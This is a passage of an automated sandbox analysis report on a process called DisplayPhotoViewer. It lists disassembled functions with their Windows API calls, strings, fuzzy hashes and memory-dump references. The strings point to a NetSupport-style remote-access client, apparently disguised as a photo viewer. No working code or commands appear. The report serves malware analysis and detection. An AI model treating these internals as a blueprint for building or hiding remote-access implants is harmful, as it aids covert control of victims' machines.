                                                                                                    • Opcode ID: 00935e143c90e49adc82f3ea21c47b46579aeadc60c21bb3c0a709f1f4bf422a
                                                                                                    • Instruction ID: 6eccb3b6f23975030ac6b8fdeb29450f49f28d4fdf2044fc10d82b0bfb9315ab
                                                                                                    • Opcode Fuzzy Hash: 00935e143c90e49adc82f3ea21c47b46579aeadc60c21bb3c0a709f1f4bf422a
                                                                                                    • Instruction Fuzzy Hash: F4218072A0021DBBDB01DBA49D89F9EB7FCEB49640F114155FE00D7284DBB4D9029BA5
                                                                                                    Function 1112F0C0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 1112F0E3
                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 1112F104
                                                                                                    • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 1112F114
                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 1112F131
                                                                                                    • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1112F13D
                                                                                                    • _memset.LIBCMT ref: 1112F157
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc$Version_memset
                                                                                                    • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                                    • API String ID: 1659045089-3162170060
                                                                                                    • Opcode ID: 220d3cf7639b9ef648069bca1bfb7fdab02eca7be9b5ffd978bdfb42a11ab85f
                                                                                                    • Instruction ID: 0910ca5fb44add3cf21b7e5d4f919857c18243e2afa22aa6fdd13c6a39c21dd0
                                                                                                    • Opcode Fuzzy Hash: 220d3cf7639b9ef648069bca1bfb7fdab02eca7be9b5ffd978bdfb42a11ab85f
                                                                                                    • Instruction Fuzzy Hash: 4A21E774F413696BF7119BB5EC85F5EFFA89B4670CFA00074E908E7184E670990087E2
                                                                                                    Function 11091420 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 38libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(USER32,?,?,1111146C), ref: 11091429
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1109143D
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1109144A
                                                                                                    • GetProcAddress.KERNEL32(?,EnumDisplayDevicesA), ref: 11091457
                                                                                                    • GetProcAddress.KERNEL32(?,MonitorFromRect), ref: 11091464
                                                                                                    • _memset.LIBCMT ref: 11091474
                                                                                                      • Part of subcall function 110913B0: _memset.LIBCMT ref: 110913D3
                                                                                                      • Part of subcall function 110913B0: _memset.LIBCMT ref: 11091405
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$_memset$LibraryLoad
                                                                                                    • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$MonitorFromRect$USER32
                                                                                                    • API String ID: 1187747625-2127564136
                                                                                                    • Opcode ID: 56c665919b1b78a67ab9dc4713c5a8fd398592f2bbb739ac3d4f4b636575fe61
                                                                                                    • Instruction ID: b01443e20630491e1ba768e31bc32c3a0d22064e76839bce87f2a9b6eee50427
                                                                                                    • Opcode Fuzzy Hash: 56c665919b1b78a67ab9dc4713c5a8fd398592f2bbb739ac3d4f4b636575fe61
                                                                                                    • Instruction Fuzzy Hash: 0EF06871A0070DABC7209F7A9C44E8BF7E9AF98704B10482EF599D7210F674A4408F50
                                                                                                    Function 110879E0 Relevance: 18.1, APIs: 12, Instructions: 149COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsValidSid.ADVAPI32(00000000,00000000,00000000,00000000,11087C90,00000000,?,?,000F037F,00000000,00000000), ref: 11087A1D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Valid
                                                                                                    • String ID:
                                                                                                    • API String ID: 1304828667-0
                                                                                                    • Opcode ID: e4658d644d18372e22aa616dc901083e31233e038d14c2a54df4ca188c26703a
                                                                                                    • Instruction ID: 4157feb83114725fd98a1a85ec113aeff410dfd94b7641b76408bba4d667728f
                                                                                                    • Opcode Fuzzy Hash: e4658d644d18372e22aa616dc901083e31233e038d14c2a54df4ca188c26703a
                                                                                                    • Instruction Fuzzy Hash: 8A419131E0462A9BDB12CFA4D889BAFB7F9EF84705F1041A9ED15E7248D730DA51C7A0
                                                                                                    Function 11037680 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 209COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset_strncpy
                                                                                                    • String ID: Client$Password$SecurityKey$SecurityKey2$UseNTSecurity$UserNames$ValidAddresses.
                                                                                                    • API String ID: 3140232205-3737366314
                                                                                                    • Opcode ID: 6ea559c46c9c735a26dc073146d3bf7001a8764100b07665d74e2a00cffffdc0
                                                                                                    • Instruction ID: a09d8f8b4f195433f7b4985c6e6c46c26e945bc7a7e47a3965ca8db74e05986d
                                                                                                    • Opcode Fuzzy Hash: 6ea559c46c9c735a26dc073146d3bf7001a8764100b07665d74e2a00cffffdc0
                                                                                                    • Instruction Fuzzy Hash: 2371F775E0061B9FD701CF28DD90BDAB7A8AF55309F0481A8E99997241EB70FA49CBD0
                                                                                                    Function 111435A0 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 174COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11070395
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 1107039B
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 110703A1
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 110703AA
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 110703B0
                                                                                                      • Part of subcall function 110702B0: InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 110703B6
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 1114373C
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11143751
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection$Exception@8Throw__wcstoi64_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                    • String ID: TracePipe$TracePipeRecv$TracePipeRecvUI$TracePipeSend$TracePipeSendUI$TraceRecv$TraceSend$_debug
                                                                                                    • API String ID: 2906687742-2018363409
                                                                                                    • Opcode ID: 793db74857c0ff7ed66e58ade16ff95ae929c4fd0bfb01fe3dc369a6f9f9563a
                                                                                                    • Instruction ID: 65445e86c2e1711482bc839fdbab266ed1198aef295d4c9dc80becb99371b76a
                                                                                                    • Opcode Fuzzy Hash: 793db74857c0ff7ed66e58ade16ff95ae929c4fd0bfb01fe3dc369a6f9f9563a
                                                                                                    • Instruction Fuzzy Hash: 4B51F7B1B14659AFD741CF798D80AAFFBE9EB45608F51482EE46AD3700EB30AD01CB51
                                                                                                    Function 11061690 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _memset_strncat_strncpy$_calloc
                                                                                                    • String ID: Drivers$PrintCapture$Printer
                                                                                                    • API String ID: 3453565913-1525524346
                                                                                                    • Opcode ID: 8007247272584a5c76d384d6e4aa6aeb8582b06e50c28b528786a77dfe3df568
                                                                                                    • Instruction ID: 7ebddecc409a4e08387718463af3d3f4cb5cf5e88379949f02e213de198cf438
                                                                                                    • Opcode Fuzzy Hash: 8007247272584a5c76d384d6e4aa6aeb8582b06e50c28b528786a77dfe3df568
                                                                                                    • Instruction Fuzzy Hash: 94410775F002596FE711CB28DD15FEBB7E99F86308F0440E4E9489B281FA74EA09C792
                                                                                                    Function 110D14B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133networkCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 110D7BA0: EnterCriticalSection.KERNEL32(111E0C5C,11017238,218EC38C,?,?,?,111C0108,1117BDB8,000000FF,?,11019202), ref: 110D7BA1
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110D1530
                                                                                                      • Part of subcall function 11157E51: RaiseException.KERNEL32(?,?,111084C4,?,?,?,?,?,111084C4,?,111C0108), ref: 11157E93
                                                                                                    • gethostbyname.WSOCK32(111E0BD0,218EC38C,00000000,?,00000000), ref: 110D1545
                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,1117BFB0,000000FF), ref: 110D1551
                                                                                                    • _memmove.LIBCMT ref: 110D157B
                                                                                                    • htons.WSOCK32(00000000), ref: 110D15A1
                                                                                                    • socket.WSOCK32(00000002,00000001,00000000), ref: 110D15B1
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D15BF
                                                                                                    • connect.WSOCK32(?,?,00000010,?,00000000,000000FF,111E0BE8,00000000,000000FF), ref: 110D15F3
                                                                                                    • WSAGetLastError.WSOCK32 ref: 110D15FE
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(111E0BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111E0BD0,00000000,000000FF,218EC38C,?,00000000,00000000,?,?,?,00000000,1117D21B), ref: 110D9983
                                                                                                      • Part of subcall function 110D98D0: OutputDebugStringA.KERNEL32(11192F38,?,?,?,00000000,1117D21B,000000FF,?,110D7033,?,Invalid Server paramters), ref: 110D998A
                                                                                                    Strings
                                                                                                    • Connect() the socket is not closed, xrefs: 110D14FD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$DebugOutputString$CriticalEnterExceptionException@8RaiseSectionThrow_memmoveconnectgethostbynamehtonssocket
                                                                                                    • String ID: Connect() the socket is not closed
                                                                                                    • API String ID: 2474459257-1125742345
                                                                                                    • Opcode ID: ff52e5c06d215aad9486f266d9517293b5ddfa05646e07b71e0b72ba60cfd219
                                                                                                    • Instruction ID: 8ff2fd134f685594d1178374d7259481bd5f3f93977281419a3f3a8e48168d76
                                                                                                    • Opcode Fuzzy Hash: ff52e5c06d215aad9486f266d9517293b5ddfa05646e07b71e0b72ba60cfd219
                                                                                                    • Instruction Fuzzy Hash: 1F417375D00709EFDB10DFA4C844B9EF7B4FF48724F10461AE926A7280EB74A504CBA5
                                                                                                    Function 11015560 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 123registrytimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • wsprintfA.USER32 ref: 11015578
                                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 110155D4
                                                                                                    • RegisterClassA.USER32(00000003), ref: 110155EE
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • CreateWindowExA.USER32(00000008,NSMIdentifyWnd,?,90000000,?,?,?,?,00000000,00000000,00000000), ref: 1101564F
                                                                                                    • UpdateWindow.USER32(00000000), ref: 1101569D
                                                                                                    • SetTimer.USER32(00000000,00000001,?,00000000), ref: 110156D0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Windowwsprintf$ClassCreateCursorErrorExitLastLoadMessageProcessRegisterTimerUpdate
                                                                                                    • String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
                                                                                                    • API String ID: 1905683801-829434836
                                                                                                    • Opcode ID: b3e9a7ee195c899a8075d36c0a767881bd778b7107becd49b6413d217b6362f5
                                                                                                    • Instruction ID: 49711948ef559976d9054697858d60f466f2c1f3074a1bee2d529a4b00b3e1d5
                                                                                                    • Opcode Fuzzy Hash: b3e9a7ee195c899a8075d36c0a767881bd778b7107becd49b6413d217b6362f5
                                                                                                    • Instruction Fuzzy Hash: C1414375E00309AFDB50CFA5DC84BDEFBF8BB88308F10842AE518AB244E775A5408F95
                                                                                                    Function 110F3050 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C), ref: 110F3101
                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 110F3145
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110F3187
                                                                                                      • Part of subcall function 11059E50: __wcstoi64.LIBCMT ref: 11059E8D
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110F3159
                                                                                                    Strings
                                                                                                    • SetThreadExecutionState, xrefs: 110F313C
                                                                                                    • Prevent Power Save (new count=%d,%d), same state=x%x, xrefs: 110F31AA
                                                                                                    • Prevent Power Save (new count=%d,%d, newstate=x%x), laststate=x%x, xrefs: 110F3175
                                                                                                    • Client, xrefs: 110F308B
                                                                                                    • *DisablePreventPowerSave, xrefs: 110F3086
                                                                                                    • Kernel32.dll, xrefs: 110F30FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressErrorFreeLastLoadProc__wcstoi64
                                                                                                    • String ID: *DisablePreventPowerSave$Client$Kernel32.dll$Prevent Power Save (new count=%d,%d), same state=x%x$Prevent Power Save (new count=%d,%d, newstate=x%x), laststate=x%x$SetThreadExecutionState
                                                                                                    • API String ID: 338032539-2187775511
                                                                                                    • Opcode ID: a331a553af070eb09a2082817ca8a01a710055d86bac074850e30d7b6147dd43
                                                                                                    • Instruction ID: 867bc4d53d25580872fdf75797e2c4a47702664779552d91db915e32514c9cef
                                                                                                    • Opcode Fuzzy Hash: a331a553af070eb09a2082817ca8a01a710055d86bac074850e30d7b6147dd43
                                                                                                    • Instruction Fuzzy Hash: A9416AB1E49269AFDB01CFDA98C1AAEFBF4FB48625F40407EE815E7604D7301904CB65
                                                                                                    Function 110359A0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 121COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
